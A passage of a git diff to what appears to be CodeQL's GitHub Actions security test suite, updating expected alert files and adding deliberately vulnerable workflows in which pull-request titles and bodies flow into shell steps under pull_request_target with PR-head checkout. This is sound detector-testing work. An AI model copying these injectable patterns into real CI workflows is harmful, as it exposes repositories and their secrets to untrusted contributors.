| echo "foo" \| sed "s/FOO/$TITLE/g" > bar | semmle.label | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | +| .github/workflows/arg_injection.yml:19:14:19:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | semmle.label | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | +| .github/workflows/arg_injection.yml:20:14:20:33 | awk "BEGIN {$TITLE}" | semmle.label | awk "BEGIN {$TITLE}" | +| .github/workflows/arg_injection.yml:21:14:21:86 | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | semmle.label | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | +| .github/workflows/arg_injection.yml:22:14:23:84 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | semmle.label | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | +| .github/workflows/arg_injection.yml:24:14:28:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | semmle.label | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | +| .github/workflows/arg_injection.yml:29:14:33:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | semmle.label | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | +| .github/workflows/arg_injection.yml:34:14:36:41 | BODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | semmle.label | BODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | subpaths #select -| .github/workflows/arg_injection.yml:14:14:14:33 | sed "s/FOO/$TITLE/g" | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:14:14:14:33 | sed "s/FOO/$TITLE/g" | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:14:14:14:33 | sed "s/FOO/$TITLE/g" | sed | -| .github/workflows/arg_injection.yml:15:14:15:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:15:14:15:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:15:14:15:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | sed | -| .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | sed | -| .github/workflows/arg_injection.yml:17:14:17:33 | awk "BEGIN {$TITLE}" | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:17:14:17:33 | awk "BEGIN {$TITLE}" | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:17:14:17:33 | awk "BEGIN {$TITLE}" | awk | -| .github/workflows/arg_injection.yml:18:14:18:86 | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | .github/workflows/arg_injection.yml:18:14:18:86 | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | .github/workflows/arg_injection.yml:18:14:18:86 | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:18:14:18:86 | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | sed | -| .github/workflows/arg_injection.yml:19:14:20:84 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | .github/workflows/arg_injection.yml:19:14:20:84 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | .github/workflows/arg_injection.yml:19:14:20:84 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:19:14:20:84 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | sed | -| .github/workflows/arg_injection.yml:21:14:25:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:21:14:25:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:21:14:25:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | sed | -| .github/workflows/arg_injection.yml:26:14:30:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:26:14:30:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:26:14:30:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | sed | +| .github/workflows/arg_injection.yml:17:14:17:33 | sed "s/FOO/$TITLE/g" | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:17:14:17:33 | sed "s/FOO/$TITLE/g" | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:17:14:17:33 | sed "s/FOO/$TITLE/g" | sed | +| .github/workflows/arg_injection.yml:18:14:18:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:18:14:18:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:18:14:18:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | sed | +| .github/workflows/arg_injection.yml:19:14:19:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:19:14:19:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:19:14:19:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | sed | +| .github/workflows/arg_injection.yml:20:14:20:33 | awk "BEGIN {$TITLE}" | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:20:14:20:33 | awk "BEGIN {$TITLE}" | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:20:14:20:33 | awk "BEGIN {$TITLE}" | awk | +| .github/workflows/arg_injection.yml:21:14:21:86 | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | .github/workflows/arg_injection.yml:21:14:21:86 | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | .github/workflows/arg_injection.yml:21:14:21:86 | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:21:14:21:86 | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | sed | +| .github/workflows/arg_injection.yml:22:14:23:84 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | .github/workflows/arg_injection.yml:22:14:23:84 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | .github/workflows/arg_injection.yml:22:14:23:84 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:22:14:23:84 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | sed | +| .github/workflows/arg_injection.yml:24:14:28:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:24:14:28:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:24:14:28:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | sed | +| .github/workflows/arg_injection.yml:29:14:33:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:29:14:33:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:29:14:33:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | sed | +| .github/workflows/arg_injection.yml:34:14:36:41 | BODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:34:14:36:41 | BODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:34:14:36:41 | BODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:34:14:36:41 | BODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | git | +| .github/workflows/arg_injection.yml:34:14:36:41 | BODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:34:14:36:41 | BODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:34:14:36:41 | BODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:34:14:36:41 | BODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | sed | diff --git a/ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.expected b/ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.expected index 73413f51a39..90e7101e5fd 100644 --- a/ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.expected @@ -1,19 +1,20 @@ edges -| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:14:14:14:33 | sed "s/FOO/$TITLE/g" | provenance | | -| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:15:14:15:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | provenance | | -| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | provenance | | -| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:17:14:17:33 | awk "BEGIN {$TITLE}" | provenance | | -| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:21:14:25:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | provenance | | -| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:26:14:30:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | provenance | | +| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:17:14:17:33 | sed "s/FOO/$TITLE/g" | provenance | Config | +| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:18:14:18:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | provenance | Config | +| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:19:14:19:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | provenance | Config | +| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:20:14:20:33 | awk "BEGIN {$TITLE}" | provenance | Config | +| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:24:14:28:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | provenance | Config | +| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:29:14:33:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | provenance | Config | nodes -| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | semmle.label | github.event.issue.title | -| .github/workflows/arg_injection.yml:14:14:14:33 | sed "s/FOO/$TITLE/g" | semmle.label | sed "s/FOO/$TITLE/g" | -| .github/workflows/arg_injection.yml:15:14:15:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | semmle.label | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | -| .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | semmle.label | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | -| .github/workflows/arg_injection.yml:17:14:17:33 | awk "BEGIN {$TITLE}" | semmle.label | awk "BEGIN {$TITLE}" | -| .github/workflows/arg_injection.yml:18:14:18:86 | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | semmle.label | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | -| .github/workflows/arg_injection.yml:19:14:20:84 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | semmle.label | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | -| .github/workflows/arg_injection.yml:21:14:25:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | semmle.label | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | -| .github/workflows/arg_injection.yml:26:14:30:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | semmle.label | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | +| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/arg_injection.yml:17:14:17:33 | sed "s/FOO/$TITLE/g" | semmle.label | sed "s/FOO/$TITLE/g" | +| .github/workflows/arg_injection.yml:18:14:18:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | semmle.label | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | +| .github/workflows/arg_injection.yml:19:14:19:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | semmle.label | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | +| .github/workflows/arg_injection.yml:20:14:20:33 | awk "BEGIN {$TITLE}" | semmle.label | awk "BEGIN {$TITLE}" | +| .github/workflows/arg_injection.yml:21:14:21:86 | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | semmle.label | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | +| .github/workflows/arg_injection.yml:22:14:23:84 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | semmle.label | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | +| .github/workflows/arg_injection.yml:24:14:28:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | semmle.label | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | +| .github/workflows/arg_injection.yml:29:14:33:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | semmle.label | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | +| .github/workflows/arg_injection.yml:34:14:36:41 | BODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | semmle.label | BODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | subpaths #select diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test.yml index 153ebc5b733..5aeb9aac7c5 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/workflows/test.yml +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test.yml @@ -1,26 +1,29 @@ -on: push +on: + pull_request_target: + +permissions: + actions: write jobs: job1: runs-on: ubuntu-latest - outputs: job_output: ${{ steps.step5.outputs.MSG5 }} steps: - uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.ref }} - id: step0 uses: mad9000/actions-find-and-replace-string@3 with: - source: ${{ github.event['head_commit']['message'] }} + source: ${{ github.event['pull_request']['body'] }} find: 'foo' replace: '' - id: step1 env: BODY: ${{ steps.step0.outputs.value}} - shell: powershell - run: | - Write-Output "::set-output name=MSG::$ENV{BODY}" + run: echo "::set-output name=MSG::${BODY}" - id: step2 env: MSG: ${{steps.step1.outputs.MSG}} diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test1.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test1.yml index 3cab86f3171..d149df2bd7c 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/workflows/test1.yml +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test1.yml @@ -19,7 +19,9 @@ jobs: uses: actions/checkout@v4 - name: Extract Jira Key - run: echo ISSUE_KEY=$(echo "${{ github.event.pull_request.title }}") >> $GITHUB_ENV + env: + TITLE: ${{ github.event.pull_request.title }} + run: echo ISSUE_KEY=$(echo "$TITLE") >> $GITHUB_ENV - name: Sink run: echo ${{ env.ISSUE_KEY }} diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test14.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test14.yml new file mode 100644 index 00000000000..6d925a82d37 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test14.yml @@ -0,0 +1,51 @@ +name: Pull Request Open + +on: + pull_request_target: + +jobs: + test1: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + with: + ref: ${{ github.event.pull_request.head.sha }} + - id: changed-files + run: | + echo "files=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.changed-files.outputs.files }}" + test2: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + with: + ref: ${{ github.event.pull_request.head.sha }} + - id: changed-files + run: | + FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/) + echo "files=${FILES}" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.changed-files.outputs.files }}" + test3: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + with: + ref: ${{ github.event.pull_request.head.sha }} + - id: changed-files + run: | + echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV" + - run: echo "${{ env.CHANGED-FILES }}" + test4: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + with: + ref: ${{ github.event.pull_request.head.sha }} + - id: changed-files + run: | + FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/) + echo "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV" + - run: echo "${{ env.CHANGED-FILES }}" + + + diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test15.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test15.yml new file mode 100644 index 00000000000..a39967760e8 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test15.yml @@ -0,0 +1,38 @@ +name: Pull Request Open + +on: + pull_request_target: + +jobs: + test1: + runs-on: ubuntu-latest + steps: + - id: title + run: | + echo "title=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.title.outputs.title }}" + test2: + runs-on: ubuntu-latest + steps: + - id: title + run: | + PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH}) + echo "title=$PR_TITLE" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.title.outputs.title }}" + test3: + runs-on: ubuntu-latest + steps: + - id: title + run: | + echo "TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV" + - run: echo "${{ env.TITLE }}" + test4: + runs-on: ubuntu-latest + steps: + - id: title + run: | + PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH}) + echo "TITLE=$PR_TITLE" >> "$GITHUB_ENV" + - run: echo "${{ env.TITLE }}" + + diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index 61c851a2cfa..4c9ea8fe8ca 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected @@ -19,28 +19,28 @@ edges | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | provenance | | | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | provenance | | | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | provenance | | -| .github/workflows/artifactpoisoning1.yml:14:9:20:6 | Uses Step | .github/workflows/artifactpoisoning1.yml:22:14:22:55 | echo "::set-output name=id::$(> $GITHUB_OUTPUT\n | provenance | | +| .github/workflows/artifactpoisoning3.yml:20:9:41:6 | Uses Step | .github/workflows/artifactpoisoning3.yml:43:14:51:45 | unzip input.zip\necho current directory contents\nls -al\n\necho Reading PR number\ntmp=$(> $GITHUB_OUTPUT\n | provenance | Config | | .github/workflows/artifactpoisoning3.yml:41:9:53:6 | Run Step: prepare [pr] | .github/workflows/artifactpoisoning3.yml:53:20:53:50 | steps.prepare.outputs.pr | provenance | | | .github/workflows/artifactpoisoning3.yml:43:14:51:45 | unzip input.zip\necho current directory contents\nls -al\n\necho Reading PR number\ntmp=$(> $GITHUB_OUTPUT\n | .github/workflows/artifactpoisoning3.yml:41:9:53:6 | Run Step: prepare [pr] | provenance | | -| .github/workflows/artifactpoisoning4.yml:9:9:17:6 | Uses Step | .github/workflows/artifactpoisoning4.yml:19:14:19:58 | echo "::set-output name=id::$(> $GITHUB_OUTPUT\necho "ref=$ref" >> $GITHUB_OUTPUT\n | provenance | | +| .github/workflows/test11.yml:22:9:30:6 | Uses Step | .github/workflows/test11.yml:32:14:44:44 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_OUTPUT\necho "ref=$ref" >> $GITHUB_OUTPUT\n | provenance | Config | | .github/workflows/test11.yml:30:9:46:2 | Run Step: set-ref [pr_num] | .github/workflows/test11.yml:19:16:19:50 | steps.set-ref.outputs.pr_num | provenance | | -| .github/workflows/test11.yml:30:9:46:2 | Run Step: set-ref [ref] | .github/workflows/test11.yml:20:13:20:44 | steps.set-ref.outputs.ref | provenance | | | .github/workflows/test11.yml:32:14:44:44 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_OUTPUT\necho "ref=$ref" >> $GITHUB_OUTPUT\n | .github/workflows/test11.yml:30:9:46:2 | Run Step: set-ref [pr_num] | provenance | | -| .github/workflows/test11.yml:32:14:44:44 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_OUTPUT\necho "ref=$ref" >> $GITHUB_OUTPUT\n | .github/workflows/test11.yml:30:9:46:2 | Run Step: set-ref [ref] | provenance | | -| .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | provenance | | -| .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | provenance | | -| .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | provenance | | -| .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | 